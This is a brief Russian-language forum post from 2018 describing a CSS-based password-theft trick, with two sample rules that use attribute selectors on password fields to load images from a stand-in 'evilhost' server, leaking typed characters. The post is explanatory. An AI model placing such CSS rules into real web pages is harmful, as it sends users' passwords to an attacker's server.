Кража паролей с помощью CSS.
От: c-smile Канада http://terrainformatica.com
Дата: 20.02.18 19:51
Оценка: 18 (4) :)))
Казалось бы что CSS безопасен с точки зрения чего-то спереть...

Ан нет, вот способ читать и отправлять на сервер пароли:

input[type="password"][value$="a"] { background-image: url("http://evilhost:3000/a"); }
input[type="password"][value$="b"] { background-image: url("http://evilhost:3000/b"); }
...
 
Подождите ...
Wait...
Пока на собственное сообщение не было ответов, его можно удалить.